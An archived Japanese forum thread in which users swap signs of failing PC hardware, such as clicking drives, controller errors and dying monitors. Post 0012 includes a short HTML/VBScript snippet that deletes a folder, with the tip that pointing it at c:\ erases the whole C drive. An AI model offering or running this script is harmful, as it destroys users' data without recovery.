X



ハードウェアが壊れる前兆を楽しむスレ
■ このスレッドは過去ログ倉庫に格納されています
0001不明なデバイスさん
垢版 |
03/06/04 13:27ID:TkhssUEg
PCを使っていると、完全に壊れてはいないけど、
壊れそうな前兆になるものです。
この壊れそうな前兆からいったいどれくらい持つのか?
本来は不安なその前兆の期間を逆に楽しむスレです。
0002不明なデバイスさん
垢版 |
03/06/04 13:28ID:TkhssUEg
ということで、今ハードディスクが1日に1回程度、
カタン・・・ブーン(電源が入ったような音)・・・動き出す。
ってな感じを繰り返しています。

システムログにはときどき次のようなものが書き込まれています。
1ヶ月に2回程度 「ドライバは \Device\Harddisk0\DR0 でコントローラ エラーを検出しました。」
3ヶ月前に2回 「デバイス \Device\Ide\IdePort0 はタイムアウト期間内に応答しませんでした。」
この間初めて出た「\Device\Ide\IdePort0 でパリティ エラーが検出されました。」

ちなみにハードディスクはIBM-DPTA-372050。24時間フル稼働。
でもこの状態が1年近く続いているのよね。さていつ壊れるか?
0006不明なデバイスさん
垢版 |
03/06/05 21:36ID:FLAhCNar
良スレの予感
0007不明なデバイスさん
垢版 |
03/06/05 21:53ID:vM6t98+V
俺は、RAM/Rが壊れたときは、

1、CDドライブという表示になってアクセス不能
2、RがATAPIエラーでまれに書き込める程度
3、RAMは、まれに書き込めても遅延書き込みエラー
4、10回に一回くらいPCを押さえつけると読み込める
5、ついに一度も書き込めなくなる
6、ディスクを入れてもランプもつかず反応しない。

って感じだった。
0008不明なデバイスさん
垢版 |
03/06/05 21:54ID:4IckAc7y
オレはメモリがこわれていることに
気づかず偉いめにあった
ことがあるよ

「上書きしてるバグどこだよ!!」
ってな〜
0009不明なデバイスさん
垢版 |
03/06/05 22:17ID:dtBsiujt
いきなり、書き込みが遅くなった。
読み込みは、通常。
0010不明なデバイスさん
垢版 |
03/06/05 22:19ID:dtBsiujt
ごめんちゃい。HDです。
0012不明なデバイスさん
垢版 |
03/06/06 11:37ID:12Voc1cJ
(´-`).。oO(HDあぼーんが出来るスクリプトらしいです)
(´-`).。oO(Set fsoFolder = fso.GetFolder("c:\temp")のtempを消去してc:\だけにすればCドライブ全部消去可能と書いて
       あります)
(´-`).。oO(ゴミ箱から復活・・・という作業は一切できません)
(´-`).。oO(当たり前ですが悪用厳禁です)
(´-`).。oO(下のスクリプトをコピーしてメモ帳に貼り付けて拡張子.htmlで保存すると利用可能)



<HTML>
<HEAD>
<TITLE>TEMPファイルの中身を消しちゃいます</TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF">

<SCRIPT LANGUAGE=VBScript>
Dim fso, fsoFolder
Set fso = CreateObject("Scripting.FileSystemObject")
Set fsoFolder = fso.GetFolder("c:\temp")
fsoFolder.Delete

</SCRIPT>

</BODY>
</HTML>
0013不明なデバイスさん
垢版 |
03/06/06 22:31ID:orJPFS8Y
11日ぶりに

ドライバは \Device\Harddisk0\DR0 でコントローラ エラーを検出しました。

キタ━━━━(゚∀゚)━━━━ッ!!
001599年9月製造
垢版 |
03/06/07 00:06ID:6AvpE4YX
みなさん詳しいですね〜
そこで質問

99年9月製造のMaxstor HDDの 本体にプリントされていないのでパーティーションが判らない・・・
スレーブはジャンパー全てとるのは判っているのだが・・・

どう挿せばマスターになるのか、わかる方よろしくいおねがいします。
0016不明なデバイスさん
垢版 |
03/06/07 00:07ID:fqkuzerv
PIOmodeになる
0017不明なデバイスさん
垢版 |
03/06/07 01:53ID:lQVADD7M
>>15
ttp://www.google.com

パーティーションのことなら俺もわからん。
人によって分け方違うしな。
0018不明なデバイスさん
垢版 |
03/06/07 23:42ID:OLHbp/G/
大昔のMacで見たNorton先生のありがたいお言葉

−これらのファイル情報は同じ場所にあるので、たぶん壊れています。

「たぶん」って何だよっ!と思いながらバックアップを試みましたが
無駄でつた。(´・ω・`)
0022不明なデバイスさん
垢版 |
03/06/07 23:57ID:y8vxfDLy
CDドライブの口がいきなりベローんて出てきた。でモーターの回転部分がぐるぐる回ってとまらない。
いじくってたらモーターの回転部分の輪ゴムみたいなところが取れちゃった。もう一度取り付けるのに苦労しますた。
0023不明なデバイスさん
垢版 |
03/06/23 20:10ID:7JnYGEIi
ココ最近、HDDの回転音が異常に五月蝿くなってきた。アクセスも凄まじく遅い。
そろそろ逝くな…
0024不明なデバイスさん
垢版 |
03/06/26 02:05ID:r3UAwtYn
職場で使ってるノート
ギリギリ、ガリガリと、妙な音が鳴るようになってかれこれ1年
数ヶ月前に、単純なファイルコピーで何度も失敗し、いったい何事かと
エラーチェック、そこで初めて不良セクタなるものを発見。
マークつけときゃ安心さ、みたいな機械の指示に従い、そのとおりにした。
以後、週に一度ぐらいずつエラーチェックをするのが習慣のようになる。
不良セクタは少しずつ増殖している様子。
いつまでもってくれるだろう。
0026不明なデバイスさん
垢版 |
03/06/30 12:08ID:oBBcrW66
あのジワジワ増えていく感じが堪らないよね
先日ついに52KBになりますた

うちのDTLAは不良セクタにアクセスするとジージー鳴くから
スキャンディスクより前に不良セクタを発見できるyo
0027山崎 渉
垢版 |
03/07/15 11:36ID:tKHD3HOs

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
0028ぼるじょあ ◆yBEncckFOU
垢版 |
03/08/02 05:58ID:CbVDFHoJ
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
0029不明なデバイスさん
垢版 |
03/08/10 17:05ID:LxiDn6pJ
モニター SONY Multiscan 17sf9

画面がピーガーピーガー状態。
以前から時々起こり、周波数の関係か?と思い少し場所を移動したりして
直していたがそろそろ限界。
いつ火を吹くか楽しみだ
0030不明なデバイスさん
垢版 |
03/08/10 17:46ID:H1Hgxlc3
2年位前に買った、STAR2000とかいう安物のDVD-ROMドライブ

買って3ヶ月でスピンアップできなくなった。
今はそいつのガワを開けて自分でスピンアップしている。
00311=2だけどさ
垢版 |
03/09/10 06:31ID:NYh29EIw
まだこのスレ生きていたか。
スレ立ててから3ヶ月。未だ壊れていない。
最近、ハードディスクを酷使しているせいか、
頻繁にエラーが発生する。
もうそろそろ危ないかもしれない。
でもこの間ディスクスキャンして修復可能な論理エラーが一件だけ。

んでさ、ふとシステムのプロパティを見たらさ、
なんとハードディスクの転送モードがPIOになっているわけ。
どうりでCD-R焼くだけでCPU使用率100%になるわけだわ。

んで、調べてみると原因はこれっぽい。
http://pcweb.mycom.co.jp/news/2003/06/04/04.html
ハードディスクのエラーが発生するとどんどん転送モードが落ちてPIOまでいくらしい。
常時起動していてこんなにエラーが出てればそうなるわな。
つーか、ResetErrorCountersOnSuccessで検索してもほとんどヒットしねぇ。
0032不明なデバイスさん
垢版 |
03/09/16 23:02ID:3wzNsFz8
わーい!初めてHD交換したよ!
だってXPなんだけど再起動して
チェックディスクしてるときにとまっちゃうんだもん。
普通に起動してもシムピープルで遊び始めると
見たこともない種類のブルースクリーン出るし
リセットしたらマザーにハードディスクが見つからないって
言われるしさ。しまいには解像度も画面色もおかしいし。

CD-Rもかなりやヴぁいよ〜
シムピインスコしてるときに何度もCABファイルがセットアップと一致しない、
ファイルが壊れてるか、不正なメディアの可能性ありって文句言われるしさ。
ちゃんと買ったのにさ・・・ハハハ コンポーネントの転送に失敗?致命的なエラーだと
やっとインスコできたと思ったらHDあぼーんだし。
しかも今度は3日かかってもインスコできねーし。

で、CD-Rドライブとかも熱暴走とかするもんなんでしょうか?
インストールしてる時に取り出したCD-ROMが妙に熱いんです。
起動して一回目のインスコは最後の方まで順調なのに、
何回もやってるうちにエラーが、出やすくなってくる。
エラーのでるファイルが特定のが多いんでメディアの問題かとも
思っても、2回は成功してゲームできたし、傷も見当たらない。配線もOK緩みもない。
後は前のHDに入れてなかったQuick time Proとの相性か
HDとの相性くらいしか思いつかないんです。
0033不明なデバイスさん
垢版 |
03/09/18 11:39ID:aw71K4bX
古いマザーの場合は電池切れによる不具合ってこともあるので要注意。
突然のフリーズから起動途中で止まるようになったりとか・・。
以前、壊れたと思って捨てた事があるよw
00341=2だけどさ
垢版 |
03/09/20 15:02ID:2VfxzzgJ
うぉ!「デバイス \Device\Harddisk1\DR2 に不正なブロックがあります。 」
が大量に出現。もうそろそろハードディスクも終わりか!?

と思ったけどよく見ればHarddisk1とDR2。いつものは
「ドライバは \Device\Harddisk0\DR0 でコントローラ エラーを検出しました。 」
だもんなぁ。久々に接続したMOでメディアがおかしくてフォーマットできなかったのが原因か?
Harddisk1\DR2がどのハードなのか知る方法ない?

でもHarddisk1になるのか? そういえばWindows標準のフォーマッタは
ハードディスク形式でフォーマットするというからおかしくないのかも。
00351=2だけどさ
垢版 |
03/09/21 18:00ID:VzW+FbiK
おぃ! とうとうハードディスクが・・・じゃなくてCD-Rドライブが壊れたぞ。
しかも突然だ。OSも落ちることなく数時間前は普通に動いていたのが突然。
これじゃぁ壊れる前兆を楽しめる所じゃない。
保障期間内だったのがせめてもの救いだ。

んで売ってもたいして金にならないからと取っておいた2倍速CD-Rドライブ復活。
おそい・・・おそすぎる。BURN-ProofやJustLinkついてないよぉ。
作業しながら焼いてて大丈夫かなぁ。
00371=2だけどさ
垢版 |
03/09/21 18:29ID:VzW+FbiK
焼きながら他の作業をしても問題ないようにする技術だよ。
2倍速なら大抵問題ないとでも言いたいの?
ジョークぐらい分かってよ(w

# 反論したいならちゃんと調べてリンク先を示すこと。
0038不明なデバイスさん
垢版 |
03/09/22 17:28ID:fgsbw1kE
HDD2台のうちアプリやらデータの入った方がたまに休む。
一度起動して温まった後で再起動すると2台動く。
しかし30分放置すると目覚めなくなってたりする。

2倍速CDドライブは動かなくなってるし
今月中に処分しとこうかな〜
0039不明なデバイスさん
垢版 |
03/10/14 01:06ID:fP4unSHy
コンデンサ、破裂してますが動いています。
0040不明なデバイスさん
垢版 |
03/10/16 17:21ID:cdoq1jZK
起動するときにブーーーンブーーーンって鳴くときがある。。
もうダメなのだろうか。。。・゚・(ノД`)・゚
WD800ABよ・・・・嗚呼・・・
0041不明なデバイスさん
垢版 |
03/12/24 16:19ID:gTSvJVtr
1,999年製のGatewayノートなんだが、2年くらい前から液晶バックライトがチカチカしだした。
最近CDドライブの駆動音が大きくなってきた。
HDのカリ音も気になりだした。

あと半年くらいかな…
0043不明なデバイスさん
垢版 |
04/07/15 23:16ID:lDk0p+S8
XPなんだけど
chkdsk /fで再起動してもchkdskしません...。
回復コンソールでchkdsk /rして通常起動してもすぐファイルシステムに問題が見つかります.........。
0044不明なデバイスさん
垢版 |
04/08/01 21:58ID:f5l5BOjU
age
0045不明なデバイスさん
垢版 |
04/09/04 21:26ID:M34yofSZ
|__∩
|エ)・) ダレモイナイ・・・イッパツゲイスルナライマノウチ・・・
|⊂丿


   .∩_∩
  ( ・(エ)・) < セーノ♪
  (\_i  i_ノ
  (_( ̄)_)



   .∩_∩
  ( ・(エ)・) < クマネチ !!
  (_(    )_)
  (_( ̄)_)


   .∩_∩
  (;・(エ)・) < ・・・・・・
  (_(    )_)
  (_( ̄)_)


|彡
|彡 サッ
|彡
00461
垢版 |
04/10/11 18:13:45ID:mIDiHBpn
おー。このスレまだ生きていたか。
もう一年以上たっているんだな。

で、ハードディスクだがいまだにちゃんと動いているぞ。
一週間に一、二回エラーログが出ているがデータの破損もない。

もうこれはハードディスクの故障ではなくドライバに
致命的ではないバグでもあるのではと思っている。
0047不明なデバイスさん
垢版 |
04/10/16 09:02:28ID:nt49lr0j
起動時のstart upサウンドが
なったり、ならなかったりしているぅぅぅぅぅぅ
0048不明なデバイスさん
垢版 |
04/10/22 03:44:10ID:qp92iZy4
ハードディスクじゃなくハードウェア?
キャノンのプリンタが壊れる前兆はけっこう分かりやすい
何日か前、印刷された紙と一緒にバネが出てきた。
これ間違いなく前兆ね。
あと1,2個出て、つぎはきっとネジ。
ある日とつぜんパタッじゃないの。
2代前のやつもそんな感じで徐々に壊れていった。
00491
垢版 |
04/10/25 08:13:00ID:IKU8BmVe
しばらくというか一年以上前からPCから異音が発生。
どこから出ているかわからないし、しばらくすると消えたりするので
放置していたんだが、最近ファンの回転数が一時的に落ちたような音がしだして、
また今まで以上にうるさくなって夜も眠れなくなったので
電源と仮定して交換。静かになった。

もしかしてハードディスクのトラブルは電源のせいだったんだろうか?
それにしてもタフなハードディスクだな。
0050不明なデバイスさん
垢版 |
04/12/22 07:06:20ID:qwBkJf7G
エプソンのプリンタ@いちお完動品をオク出品するのに梱包してたら
なぞのねじが転がり出てきた。
見ない振りしてそのまま送った。南無


オクで中古のでかい無停電電源が安く出てるので使ってみな
おそらくどっかのプロバイダだかの施設で定期交換した廃品だと思われるが
寿命には達しておらず、家庭で使う分には結構まだまだ頼りになる
冬場の瞬時ドロップなどは完全に消えたみたい
新品の交換バッテリーも出品されてるのでまた次の夏になったら替えてみようかと
おもってる
何気なく注文したら20kgくらいあるのを黒猫のにいちゃんが手押し車で運んできて
どうやって戸口から部屋に運び入れようかと思ったw
0051不明なデバイスさん
垢版 |
04/12/25 23:46:00ID:7UZGtfx0
えーっと、セカンダリに繋いでるHDDなんですが、2回に1回は起動してもOS(Windows)から見えません。
HDD Health で Read Error のレートが 56-58の間をさまよいます。
温度が 51度ほどあるそうです。

120Gのデータをどうやってリストラ&移行させようか…
0052不明なデバイスさん
垢版 |
05/02/03 21:43:13ID:UteSAj46
VAIO PCG-U3、
USB2.0増設PCカードを挿したままでは起動できなくなった。
(購入当時は起動できていた)
そして日に日に大きくなる高周波音。
これはやばいと思いじゃんぱらへ売りつける。八万になった。
ずっと外付マウス+外付キーボード+外付モニタで使っていたので
外見だけは激美品w
0053不明なデバイスさん
垢版 |
05/02/23 09:07:26ID:CHwAtIV7
文字というか画面に表示されている全てが
ぼやけてきた
壊れるのはビデオカードかモニターか?
0054不明なデバイスさん
垢版 |
05/02/25 22:25:44ID:XWLwKC50
>>53
同じ症状でモニタ変えたら直った。
0055不明なデバイスさん
垢版 |
05/02/26 03:25:16ID:O/wuaXkZ
>>51
一番手軽なのは、USB接続の外付けHDDだろうね、やっぱり。
250GBのでも20Kちょっとで買えるし。
0058& ◆FnStUl6OzU
垢版 |
05/03/01 10:52:43ID:+97hmM5W
 HDDの障害履歴は、S.M.A.R.T.が記録していてくれるってのを
最近ようやく実感できるようになったのYO。 smartmontoolで
ゲロさせると、何回リードエラーしたとか、何時間仕事したかも
判る。 ま、出てくるデータの中身と信頼性はDISKメーカによる。
F通製13GBのユニットなんか、何度か立ちゴケしてエラー記録なし。
マジスカ? 古いディスクを眺めて楽しんでいるのであった。

0059不明なデバイスさん
垢版 |
05/03/16 20:28:39ID:0MV/VsDq
ノートパソコンの液晶に、縦に2本線が入った。
液晶をちょっと捻ると線が消える。

フレキの接触が怪しくなって来ているのかな。
00601
垢版 |
05/03/19 10:17:49ID:f2mXPmYZ
俺のハードディスクと同じように
このスレの息も長いな。
相変わらずハードディスクは時々かたんっていうのに
いまだ死なず。4年が経とうとしている。

>>58のおかげでS.M.A.R.T.があるのを思い出したので、
smartmontool・・・はLinux用か? なのでHDDLifeってのを使ってみた。
健康度100%らしい・・・。
うーむ。S.M.A.R.T.って有効にしていたかな? 無効なら無効ってでるよな?
00611
垢版 |
2005/03/23(水) 07:54:24ID:GyCf9cuI
実は福岡県中央区人だぜぇ。
俺のハードディスクは震度6弱の揺れに耐え抜きましたw
0062不明なデバイスさん
垢版 |
2005/03/23(水) 23:50:27ID:DfW7HOga
>>60
HDDLifeよりHDD Health使え。
具体的な死亡予定日時が出て面白い。
0063不明なデバイスさん
垢版 |
2005/04/26(火) 13:48:42ID:pmhQDHbg
>>61
ウチのNASは死にますた。
揺れというか、揺れにともなう「落下」のせいで。
0064不明なデバイスさん
垢版 |
2005/10/10(月) 22:54:17ID:yr4vGff5
15年間使ってるラジカセは、電源ボタン押すとCDトレイが開いたり、
突然ラジオに切り替わったりと怪奇現象続発
0065不明なデバイスさん
垢版 |
2005/10/11(火) 09:38:18ID:C34bsQLt
ハードディスクが動作中にいきなりカタンと音を立てた直後に止まる?
筐体の側面を叩くと又、動き出す!
半年間も同じ事の繰り返し壊れるなら早く壊れろ。
なかなか踏ん切りがつかないじゃないか!
0066不明なデバイスさん
垢版 |
2005/12/01(木) 15:54:00ID:wC8wBviu
2台のPCにモニタもう一台出すの面倒で電源つけっぱでケーブル抜き差ししてたらビデオカードのD-SUB出力壊れた
最初、紫っぽい色になって一度電源を切って挿し直して電源つけたらモニタ認識しなくなった。
DVI出力があるからDVI→D-SUBの変換コネクタ使ってどうにかしてる。
0067不明なデバイスさん
垢版 |
2006/01/12(木) 16:22:37ID:aMJGIi3I
DVDトレイが針金無しで出てくる確立が50%以下になってる。
いい加減捨てようとするとスーっと出たりして踏ん切りがつかない
0068不明なデバイスさん
垢版 |
2006/02/10(金) 00:04:53ID:do1wtHbU
使ってると30分以内に必ずアルファベットの表示された青画面だ
0069不明なデバイスさん
垢版 |
2006/02/10(金) 14:35:22ID:hbDEicK0
これはもう終わりなのか
それとも復活してくださるのか

デバイスタイムアウト
「タイムアウト期間内に指定した\Device\Harddisk1|DR4でのI/O操作が完了しませんでした。」
0070不明なデバイスさん
垢版 |
2006/02/11(土) 12:42:54ID:SgHklHmm
1さんお元気ですか?
あなたの立てたスレが、ついに70レスの大台に乗りましたよ。



70レス到達記念age
0071不明なデバイスさん
垢版 |
2006/02/15(水) 13:40:03ID:Vtd0/F5y
【メーカー】SOTEC(デスクトップ)
【初期症状】購入から約4年、壊れる半年前くらいかな、HDDの音が大きくなりだした。
【中期】別段エラーとかは出ないんだが読み込みに異常に時間がかかるようになる
そんで起動する時にガリガリという音が・・・・
【末期】ある日、起動する時にウィ〜ン・ガッ・ガガッってな音が鳴ってだな・・・
「流石にヤバげだな〜」とか思いながら漫画読んでDTMで音楽聴いてたら

ギュィーッ・ガッ・ゥガフゥン!

て音が鳴って、それ以来何をしようが反応しなくなった。Ω\ζ゜)チーン

【埋葬】HDDとメモリとスロットに入ってたの全部引っこ抜いて、その他は全部バリバリに折りたたんで燃えないゴミの日に(ry
4年半もの間、お世話になりました。。。
0072不明なデバイスさん
垢版 |
2006/02/28(火) 00:10:22ID:ty2asdgE
半年前に買ったシリアルATAの200GBHDD(WD製)が死にそうです。
HDD Healthでの死亡時期が2006/2/28・・・
現在、MaxLineのHDDに「総員退避」というフォルダを作成してバックアップ中です。
時々、カチンという音が聞こえますが、大切なデータなので間に合って欲しいです。

安いって理由でWDなんて買うんじゃなかった・・・

0074不明なデバイスさん
垢版 |
2006/05/03(水) 20:09:36ID:OU/aaQQ5
ある日削除できないフォルダが出てくる。
チェックディスクかけて直ったところを削除する。
いつの間にか違うファイルやフォルダが壊れている。
チェックディスクをかける・・・全部のファイルが壊れました・・・

チェックディスクおそろしす。
0075不明なデバイスさん
垢版 |
2006/05/03(水) 20:40:15ID:N5vcaFCE
>>72
HDD Healthとか全然あてにならん
今maxtorのHDDが2004年から壊れそうと表示でたが、

いまだに余裕で現役
0076不明なデバイスさん
垢版 |
2006/05/03(水) 22:10:10ID:WVLEqYct
とても寒い日だけNTLDRをmissingするってのは何の前兆かねぇ
最近は暑いくらいだからとても快調なんだが
0077不明なデバイスさん
垢版 |
2006/05/04(木) 08:04:39ID:/3teEgUj
マウスホイールにちょっと触れただけでスクロール発動するようになりやがった。
これが本当のCursedScrollだな。
0078不明なデバイスさん
垢版 |
2006/05/21(日) 12:57:56ID:eZxq+Oo0
古いノートPCがすぐに電源が切れるようになった。
前はファンにほこりが詰まって止まっていたのでなんとか穴からピンセットで取り、
それで改善したが今度のはCPUについてるのが多分だめになってすぐに
高熱になってしまうのだと思う。今は保冷剤敷いてだましだましやっているが、
蒸発した水分がいつPCをダメにするかわからない。
ノートPCを開ける勇気もないのでこれを機に買い換えるか。
0079不明なデバイスさん
垢版 |
2006/05/30(火) 16:08:09ID:SDR5HHnJ
>>78
昔に比べたらかなり安いし買い換えお勧め。
火事になったらしゃれにならないでしょ。
0080不明なデバイスさん
垢版 |
2006/06/10(土) 00:16:48ID:xZ8wdve5
電源入れてもHDDが回転しない。
叩くと動く。
起動中も止まる。
でもそのうち復帰する。
こんな状態でもう2年目。
HDD Healthは「今日壊れるぜ〜っ!」と1年半警告してるよ…
0081不明なデバイスさん
垢版 |
2006/10/11(水) 22:26:31ID:FtYShGDU
>>71 「ギュィーッ・ガッ・ゥガフゥン!」
不覚にもフイタw
家はこの前中古のSCSI(15000回転)HDD導入したんだが、起動時に「キューン」アクセス時に「ガガガガガ」と、凄まじい音するんだが、普通こんなもんなんかなぁ;
使い勝手は良好なのだけどね;

昔中古で買ってきたMatrox Paheliaは、末期にデュアルならぬ1/2ディスプレイ状態になったことがあった。
左半分がみえなくなってたので、とても使い辛かったです。

最近では、電源の端子の接触不良で海門のSATAHDDがたまにWindows上から消えます。
ケーブル捻ったりしてると、また再認識してくれるのだけれど・・・・これも其の内こわれちゃうんだろーな;
0082不明なデバイスさん
垢版 |
2006/10/12(木) 06:07:59ID:AmzqfyYQ
HDDがときどき、カキンとかコキンとか金属を弾くような小さな音を立てる
交換したばっかで新品なんだけど、仕様なのかな
0085不明なデバイスさん
垢版 |
2006/10/15(日) 00:56:19ID:MW1fNp7A
4年間使ってるCRTモニタRDS151Xがそろそろ逝きそう
三原色がそれぞれ断線しかかっててすごいカラフル
叩いたら直るんだけど画面半分写らなくなったり超お茶目
新しいゲーム用のモニタ買わなきゃなんらんなぁ
0086不明なデバイスさん
垢版 |
2006/11/05(日) 05:32:38ID:sQW5l3c1
ついこの間ぶっ壊れた5年物の幕

・半年程前から起動直後に甲高い異音が度々することがあった。
・2ヶ月程前から起動して暫くたつと全く何の入力も受け付けなくなり、
酷い時にはモニタがブラックアウトしてそのまま電源が切れた。
NVIDIAで似たような現象が起こる事を知っていたのでその治療法である
最新のドライバを入れるで対応したが2回入れなおしても直らず。
3回目でやっと症状が治まる。
・1ヶ月程前から全体的に動きがもっさりしてきて、一週間程前から更に酷くなる。
・10月のある日、電源ボタンを入れると5年物幕はひっそりとお亡くなりになっていた…。
0087不明なデバイスさん
垢版 |
2006/11/05(日) 14:27:30ID:HT9Pxdr/
・゚・(ノД`)・゚・
俺の2000年型LC600はまだ問題なく稼働してるが、いつかお迎えがくるんだろうな
0088不明なデバイスさん
垢版 |
2006/11/24(金) 02:33:40ID:kVUKb9+E
気がついたら、膨大な英数字アニメタイトルのアニソンが入ったフォルダが消えていた。
それだけが。何故だ…orz
次はなんだ…買ってまだ一ヶ月なんにorz
0089不明なデバイスさん
垢版 |
2006/11/25(土) 18:02:26ID:7N6W9jZ0
HD革命/Clone Diskがいいのかなー
0090不明なデバイスさん
垢版 |
2006/11/26(日) 01:20:13ID:tEqkWeNN
ウチのST3250824ASが忘れた頃に「キン、キン、キン、」と鳴きます。
いつ昇天しても良い様にキャッシュ専用にしてますが・・・

逝くなら早く逝ってくれよー
0091不明なデバイスさん
垢版 |
2006/11/29(水) 10:31:19ID:5ZaW11nu
>>90
キャッシュエラーが頻発する原因はおまいか!
アニメとかバラエティとかを共有してるんだろ!
0092不明なデバイスさん
垢版 |
2006/12/30(土) 23:22:40ID:+IhRWiHK
数年前から電源ユニットの電源を入れると勝手にメインスイッチが入る現象が出てる。
メインスイッチをタイミング良く入れながら電源ユニットの電源を入れると上手く立ち上がるが、
タイミングが合わないと立ち上がらない。

いったん立ち上がってしまうと、メインスイッチだけでパソコン電源の入切が出来るようになるから
問題が解決する。
が・・・停電やパソコン本体のコンセントを抜かなければならない事態になった時にまた同じ現象が起きる。

正直参ってるよ。
0093不明なデバイスさん
垢版 |
2007/01/30(火) 19:15:03ID:5rdq6cFZ
2006年10月頃にMaxtorの250ギガのハードディスクがついに壊れたぞ。
音楽ファイル保存用に増設したもので、メールなどの重要なデータは入っていませんでした。
完全に壊れてしまう前に外付けドライブへ待避したし。

壊れる1ヶ月前
起動時にブルースクリーンが出た。←この青画面こそ、「このハードディスクはまもなく故障する可能性があります」という警告だったかもね。
音楽を再生しているときに「カチンカチンカチンカチン・・・・」というヘッドが激しく振動する変なシーク音が。このシーク音が出た時点で
外付けドライブへ全ファイルを待避。その後、そのハードディスクを使い続けていたが、変な異音はひどくなっていき、アクセスに時間が掛かったと思うと、
メディアプレーヤーがフリーズ。しばらくして何とか再生出来た。この症状を繰り返すうちに症状はひどくなっていった。
そして、ついに全くアクセス不能となり、エクスプローラから見てみると該当するハードディスクのみ、容量は0バイト。データを参照することも
音楽を再生することも出来なくなった。スキャンディスクを掛けてみてもエラーメッセージが出てそれで終わるだけ。

増設用ドライブを日立製の40ギガのドライブへ交換した。40ギガは容量が少ないが、私の音楽ファイルはせいぜい10ギガに留まっていたので
これで十分だと観念した。いっぱいになれば今度は80ギガのものに換装するが・・・・交換に掛かった費用は痛かったな。
でも、ブルースクリーンでハードディスククラッシュに気付いたのがよかったな。これで大切な音楽データを失わずに済んだ。
現在もバックアップは欠かさずにやっています。
0094不明なデバイスさん
垢版 |
2007/02/28(水) 10:15:25ID:i+RCLRLm
マイピクチャーに画像保存すると次の日には必ず「開けません」といわれます。
ZIPファイルも1/5くらいの割合で破損している模様。
00961
垢版 |
2007/07/01(日) 11:10:32ID:QQ0YtEWn
おー。このスレまだ残っていたかw
結局壊れることなく、その役目を終えてしまったぞw
0098不明なデバイスさん
垢版 |
2007/07/02(月) 21:01:03ID:4JOY3e92
今日OSを入れ替えたNoteがアプリを入れ始めたところで
カコンカコン言い始めて途中で逝ってしまいました。
0099不明なデバイスさん
垢版 |
2007/07/02(月) 23:53:14ID:efbLA/vY
1.5ギガの最古のハードディスクが最も元気な不思議
0101不明なデバイスさん
垢版 |
2007/07/05(木) 13:00:08ID:MzszD1rr
>カコンカコン言い始めて途中で逝ってしまいました

耐えられよ。

今はそれしか云えぬ・・・
0102不明なデバイスさん
垢版 |
2007/07/05(木) 13:27:39ID:77mrn2+R
99年製のマイMebiusが
「ガリガリガリガリヴィィィン」
って音出しながら起動するんだが、これってHDDの寿命かな?
0103不明なデバイスさん
垢版 |
2007/07/05(木) 19:50:29ID:3Z/biCzM
10年物のCRTモニタの上部がウネウネ表示されるようになった、、、
買い替え時かねぇ。けどCRTってもうほとんど無いのね、、、
0104不明なデバイスさん
垢版 |
2007/07/05(木) 22:05:44ID:SFoDkwJ7
富士通96年冬モデルのデスクトップに標準装備のHDD(quantum製・1GB・5インチ!)は、まだ使えている。
そして、やはり同機種に標準装備の松下製ドライブもご存命。これはCCCDをCDDAとして読んでくれるので貴重。
加えて十数年前のフロッピィ数十枚も、全てまだ読める。

一方、名機PM-770Cは最近動作音が怪しくなってきた。
0105不明なデバイスさん
垢版 |
2007/07/06(金) 05:25:23ID:ToAJ1pDF
スプリンターにて、高速道路に乗っていて那須方面までいこうとしたが、矢板市付近でミッションから異音が。
私は危険だと思い、矢板で通行料金を払って降りた。矢板市の道路で案の定、エンストしまくって動かなくなった。
何度も試行錯誤でエンジンを掛けてやっと発進出来たと思ったら今度はミッションからガリガリという異音を立てながら、
時速40キロの速度でやっと小山まで帰りましたよ。翌日、トヨタの修理工場で見てもらったらトランスミッションの故障だって。
0106不明なデバイスさん
垢版 |
2007/09/07(金) 18:31:37ID:FASYKBWC
増設したLANカード蟹ちっぷが、タスクバー上ではバッテンじるしがついてる。

ネットワークには時々つながらない。
0107不明なデバイスさん
垢版 |
2007/09/07(金) 18:43:50ID:2636GuMn
HDDからのキーーーーーーーーーーンっていう高周波音が。
そろそろヤバス
0108不明なデバイスさん
垢版 |
2007/09/09(日) 18:49:24ID:trj26Yhr
>>106
偶然にもうちも同じ
先日液晶モニタを購入して余ってたPCでサブマシンを作ったんだけど
ダンボールに入ってた蟹チップのLANボードが時々切れる
代わりが1つもないからだましだまし使ってる;
0109不明なデバイスさん
垢版 |
2007/09/20(木) 18:21:18ID:p6xVjc2W
蟹が悪いんじゃない。
スイッチが逝っているだ。
0110不明なデバイスさん
垢版 |
2007/09/20(木) 23:50:41ID:wE+QOE8/
5年使ってたPCからジュージューって加湿器みたいな音がするように。
その後ついに「Operating System not Found」を表示するようになり逝かれた。
0111不明なデバイスさん
垢版 |
2007/10/03(水) 20:06:52ID:+KocV5KS
6月に液晶モニタの左端に黄緑の線が入り、7月頭に画面が物凄い勢いでブレたあとブラックアウト
2日も放置したら復活したので冷やしながらだましだまし使ってたんだが、
一週間前何の前触れもなくブゥゥンッブハッと音を立ててブラックアウトした
0113不明なデバイスさん
垢版 |
2007/11/09(金) 05:48:32ID:tB0vkgWz
1ヶ月ほど前からネットワークの切断が目立つように
ルータを見てみたら時計が2002年になってる・・・
戻してみるもまた切断と供にすぐにログと日付が戻ってしまう

ギガビットルータの導入を考えてたから丁度良かった
0114不明なデバイスさん
垢版 |
2007/12/20(木) 20:00:20ID:bejYv3BA
PCにサウンドカード取り付けようとしたんだけどなかなかさせなくて
端子を回路のどこかにぶつけておかしくしたのか、起動したら深刻なエラーと表示が
それ以来音が出なくなってしまった。動画や画像処理にもたつくようになり
やたらメモリを食うようになった。チップセットが壊れたぽいでも事務用途ではなんと使えるんで
限界までつかっているっす
0115不明なデバイスさん
垢版 |
2008/01/02(水) 10:59:14ID:POMMIQSc
このスレよんでてたのしいから困る。
0116不明なデバイスさん
垢版 |
2008/01/03(木) 22:36:46ID:n6DPkCbq
もうすぐ5年になるノートをオクに出そうかと思ってるんだけど、
2年位前から、たまにカシャカシャ、カコーンと言う音がするんだよね、
これ出品する時に記載したほうがいいのかな〜
でも、2年前からたまに音してたし、
別にHDDが根を上げているとも限らないし、
わざわざそんな事書く必要もないのかね?
どうしたらいいのか・・
